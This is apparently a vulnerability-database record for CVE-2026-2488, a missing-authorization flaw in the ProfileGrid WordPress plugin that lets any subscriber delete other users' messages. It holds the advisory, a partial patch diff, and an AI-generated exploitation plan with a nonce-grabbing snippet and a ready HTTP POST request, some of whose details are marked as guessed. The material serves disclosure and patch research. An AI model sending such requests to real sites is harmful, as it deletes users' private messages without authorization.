[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvGVWpl_H-vHgeOdZa346zhQurAG1rAvpmUu9m9Ww1jo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-2488","profilegrid-missing-authorization-to-authenticated-subscriber-arbitrary-message-deletion","ProfileGrid \u003C= 5.9.8.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Message Deletion","The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized message deletion due to a missing capability check on the pg_delete_msg() function in all versions up to, and including, 5.9.8.1. This is due to the function not verifying that the requesting user has permission to delete the targeted message. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages belonging to any user by sending a direct request with a valid message ID (mid parameter).","profilegrid-user-profiles-groups-and-communities",null,"\u003C=5.9.8.1","5.9.8.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-06 11:44:27","2026-03-07 01:21:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4c611fa0-28ef-4425-8614-fb61e250e625?source=api-prod",1,[22,23,24,25,26,27,28],"admin\u002Fclass-profile-magic-access-options.php","admin\u002Fpartials\u002Fadd-group-tabview.php","includes\u002Fclass-profile-magic-html-generator.php","profile-magic.php","public\u002Fclass-profile-magic-public.php","public\u002Fjs\u002Fpg-messaging.js","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-2488 (ProfileGrid Arbitrary Message Deletion)\n\n## 1. Vulnerability Summary\nThe **ProfileGrid** plugin (up to and including version 5.9.8.1) contains a missing authorization vulnerability in the `pg_delete_msg()` function. While the function is registered as an authenticated AJAX action, it fails to perform a capability check or verify ownership of the message being deleted. This allows any authenticated user (e.g., a Subscriber) to delete arbitrary messages from any conversation across the site by providing a specific message ID (`mid`).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `pg_delete_msg` (inferred from function name and JS logic)\n- **HTTP Method:** POST\n- **Parameters:**\n    - `action`: `pg_delete_msg`\n    - `mid`: The ID of the message to be deleted (integer).\n    - `_wpnonce` or `nonce`: A valid AJAX nonce.\n- **Authentication Level:** Authenticated (Subscriber+).\n- **Precondition:** The attacker must know or guess the `mid` of the target message.\n\n## 3. Code Flow\n1. **Entry Point:** An authenticated user sends a POST request to `admin-ajax.php` with the action `pg_delete_msg`.\n2. **Hook Registration:** The plugin registers the AJAX handler (likely in a class like `PM_Messaging` or `Profile_Magic_Public`) using `add_action('wp_ajax_pg_delete_msg', 'pg_delete_msg')`.\n3. **Execution:**\n    - The `pg_delete_msg()` function is invoked.\n    - It retrieves the `mid` parameter from `$_POST['mid']`.\n    - It likely performs a nonce check (e.g., `check_ajax_referer('ajax-nonce', 'nonce')`).\n    - **Vulnerability:** It proceeds to call a database deletion method (e.g., `$wpdb->delete(...)` on the messaging table) using the provided `mid` without verifying if the `current_user_id()` is either the sender or the recipient of that specific message.\n4. **Sink:** The message is removed from the database regardless of ownership.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes the AJAX nonce in `public\u002Fclass-profile-magic-public.php`.\n\n### Identification\n- **JS Object:** `pm_ajax_object` (or `pg_msg_object` in messaging contexts).\n- **Nonce Key:** `nonce`.\n- **Localization Source:**\n```php\n\u002F\u002F From public\u002Fclass-profile-magic-public.php\nwp_localize_script(\n    $this->profile_magic,\n    'pm_ajax_object',\n    array(\n        'ajax_url'         => admin_url( 'admin-ajax.php' ),\n        'nonce'            => wp_create_nonce( 'ajax-nonce' ),\n    )\n);\n```\n\n### Strategy\n1. **Trigger Loading:** The messaging scripts and nonces are enqueued on the User Profile page or pages containing the ProfileGrid messaging shortcode.\n2. **Create Test Page:** Use WP-CLI to create a page with the ProfileGrid Messaging shortcode.\n   ```bash\n   wp post create --post_type=page --post_title=\"Messages\" --post_status=publish --post_content='[pm_messages]'\n   ```\n3. **Login & Navigate:** Log in as the Subscriber (Attacker) and navigate to the created page.\n4. **Extract:** Use `browser_eval` to grab the nonce:\n   ```javascript\n   window.pm_ajax_object?.nonce || window.pg_msg_object?.nonce\n   ```\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan\n1. **Discovery:** Use WP-CLI to identify the messaging table and a target message ID belonging to another user.\n2. **Setup:** Log in as an attacker (Subscriber).\n3. **Nonce:** Obtain the `ajax-nonce` from the frontend using the strategy in Section 4.\n4. **Attack Request:**\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=pg_delete_msg&mid=[TARGET_MID]&nonce=[ACQUIRED_NONCE]\n   ```\n5. **Validation:** Check the database to confirm the message with `mid` is gone.\n\n## 6. Test Data Setup\n1. **Users:**\n   - `victim_user` (Subscriber)\n   - `attacker_user` (Subscriber)\n2. **Message Creation:**\n   - ProfileGrid uses a custom table for messages. Since the source doesn't show the schema, we must find it.\n   - Run `wp db tables | grep pg_` to find the messaging table (likely `wp_pg_messages`).\n   - Use `wp db query` to insert a dummy message between two non-attacker users.\n   ```bash\n   # Example insertion (table name and columns inferred)\n   wp db query \"INSERT INTO wp_pg_messages (sender_id, recipient_id, message) VALUES (2, 3, 'Private Victim Secret')\"\n   ```\n3. **Identify Target ID:**\n   ```bash\n   wp db query \"SELECT mid FROM wp_pg_messages WHERE message = 'Private Victim Secret'\"\n   ```\n\n## 7. Expected Results\n- **Response:** The server should return a success status (likely `1` or a JSON success message).\n- **Database State:** A query for the `mid` should return zero results.\n- **Frontend State:** The message should no longer appear in the \"Victim's\" inbox\u002Foutbox.\n\n## 8. Verification Steps\n1. **WP-CLI Database Check:**\n   ```bash\n   # Query the messaging table for the deleted ID\n   wp db query \"SELECT * FROM wp_pg_messages WHERE mid = [TARGET_MID]\"\n   ```\n   *Expected: Empty result.*\n2. **Log Inspection:** Check for any \"Unauthorized\" errors in `wp-content\u002Fdebug.log` (though none are expected as the check is missing).\n\n## 9. Alternative Approaches\n- **Parameter Name Guessing:** If `mid` fails, check `pg-messaging.js` or the plugin source for other ID parameters like `message_id` or `tid` (thread ID).\n- **Global Nonce:** If `ajax-nonce` is rejected, look for a more specific messaging nonce that might be localized within `pg_msg_object`.\n- **Direct Hook Execution:** If the AJAX action name `pg_delete_msg` is incorrect, grep the full plugin directory for `wp_ajax_` to find the exact registered action:\n  ```bash\n  grep -r \"wp_ajax_\" . | grep \"delete\"\n  ```","The ProfileGrid plugin for WordPress is vulnerable to unauthorized message deletion in versions up to and including 5.9.8.1. The pg_delete_msg() function lacks proper ownership or capability checks, allowing any authenticated user to delete private messages belonging to any other user by simply providing a valid message ID.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.1\u002Fadmin\u002Fclass-profile-magic-access-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.2\u002Fadmin\u002Fclass-profile-magic-access-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.1\u002Fadmin\u002Fclass-profile-magic-access-options.php\t2026-02-11 04:48:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofilegrid-user-profiles-groups-and-communities\u002F5.9.8.2\u002Fadmin\u002Fclass-profile-magic-access-options.php\t2026-02-18 10:48:28.000000000 +0000\n@@ -92,7 +92,7 @@\n \n                 $admin_note = get_post_meta( $id, 'pm_admin_note_content', true );\n \t\tif ( trim( $admin_note )!='' ) {\n-\t\t\t$note          = '\u003Cdiv class=\"pg-admin-note\">' . $admin_note . '\u003C\u002Fdiv>';\n+\t\t\t$note          = '\u003Cdiv class=\"pg-admin-note\">' . wp_kses_post( $admin_note ) . '\u003C\u002Fdiv>';\n \t\t\t$note_position = get_post_meta( $id, 'pm_admin_note_position', true );\n \t\t\tif ( $note_position=='top' ) {\n \t\t\t\t$content = $note . $content;\n... (truncated)","1. Login to the WordPress site as a Subscriber-level user.\n2. Navigate to any page where the ProfileGrid messaging interface is active (e.g., a User Profile) to obtain the localized AJAX nonce (e.g., from the `pg_msg_object.nonce` or `pm_ajax_object.nonce` JavaScript objects).\n3. Identify the target message ID (`mid`) of a message to be deleted (this can often be found by inspecting the DOM of one's own messages or via enumeration).\n4. Send an authenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters: `action=pg_delete_msg`, `mid=[target_mid]`, and the acquired nonce.\n5. The server will process the deletion without verifying if the authenticated user is the sender or recipient of the message associated with the provided `mid`.","gemini-3-flash-preview","2026-04-18 05:38:34","2026-04-18 05:38:54",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","5.9.8.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofilegrid-user-profiles-groups-and-communities\u002Ftags\u002F5.9.8.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofilegrid-user-profiles-groups-and-communities.5.9.8.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofilegrid-user-profiles-groups-and-communities\u002Ftags\u002F5.9.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofilegrid-user-profiles-groups-and-communities.5.9.8.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofilegrid-user-profiles-groups-and-communities\u002Ftags"]